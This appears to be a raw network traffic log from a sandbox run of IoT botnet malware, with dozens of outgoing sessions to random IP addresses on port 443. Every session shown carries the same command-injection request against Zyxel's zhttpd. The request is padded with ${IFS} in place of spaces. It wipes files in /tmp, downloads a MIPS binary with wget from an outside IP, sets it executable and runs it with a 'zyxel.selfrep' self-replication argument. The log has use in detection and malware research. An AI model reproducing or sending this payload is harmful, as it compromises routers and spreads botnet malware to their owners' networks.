                                                        Jan 28, 2024 10:13:07.696408033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8196192.168.2.143309493.61.241.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696451902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8197192.168.2.1440606216.107.185.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696501970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8198192.168.2.1458654162.69.11.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696542025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8199192.168.2.143826675.61.230.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696563959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8200192.168.2.144020444.254.40.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696593046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8201192.168.2.1459524135.26.61.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696624041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8202192.168.2.145257485.142.77.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696660995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8203192.168.2.1452248193.84.34.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696692944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8204192.168.2.1447300116.249.20.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696739912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8205192.168.2.144598657.233.26.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696764946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8206192.168.2.144299038.250.104.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696810961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8207192.168.2.143812065.100.203.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696854115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8208192.168.2.1448328134.20.75.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696861982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8209192.168.2.145776092.250.89.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696919918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8210192.168.2.145830262.29.254.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696970940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8211192.168.2.1434284140.140.149.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697004080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8212192.168.2.1439928183.68.186.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697046995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8213192.168.2.1441008217.254.240.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697072029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8214192.168.2.1460514100.26.72.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697101116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8215192.168.2.145725236.46.39.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697140932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8216192.168.2.1437672117.100.40.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697175980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8217192.168.2.1433230145.163.77.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697218895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8218192.168.2.145629661.121.135.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697251081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8219192.168.2.1457130115.111.0.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697273970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8220192.168.2.1449240121.78.246.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697302103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8221192.168.2.144003653.146.107.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697345018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8222192.168.2.144620054.75.61.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697371960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8223192.168.2.145340890.28.144.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697405100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8224192.168.2.143418293.181.64.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697432995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8225192.168.2.143418483.222.139.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697482109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8226192.168.2.14336621.80.18.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697495937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8227192.168.2.143504460.41.255.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697546005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8228192.168.2.143395051.27.68.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697578907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8229192.168.2.1437898206.75.202.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697612047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8230192.168.2.145998840.35.53.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697654009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8231192.168.2.145442281.111.11.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697695971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8232192.168.2.1439770103.143.37.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697716951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8233192.168.2.1436314190.245.147.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697760105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8234192.168.2.144793494.222.193.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697801113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8235192.168.2.1456636165.24.111.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697824001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8236192.168.2.144147263.43.101.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697901011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8237192.168.2.1453160190.83.242.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697921038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8238192.168.2.1444990180.248.139.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.697993994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8239192.168.2.143342048.155.171.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698007107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8240192.168.2.143604066.162.137.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698048115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8241192.168.2.1433184166.217.24.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698069096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8242192.168.2.143473882.109.204.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698122978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8243192.168.2.1443392178.209.198.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698151112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8244192.168.2.1458342116.24.124.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698177099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8245192.168.2.1452604109.160.21.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698221922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8246192.168.2.1435678169.86.151.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698257923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8247192.168.2.143900420.183.93.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698288918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8248192.168.2.1452722126.76.46.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698316097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8249192.168.2.143425298.167.110.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698357105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8250192.168.2.143476846.85.219.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698396921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8251192.168.2.1441570107.215.206.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698425055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8252192.168.2.1452634184.34.236.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698460102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8253192.168.2.145875834.188.14.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698507071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8254192.168.2.143991635.48.129.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698537111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8255192.168.2.1452468179.142.88.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698594093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8256192.168.2.1437618137.204.159.25443
                                                        TimestampBytes transferredDirectionData
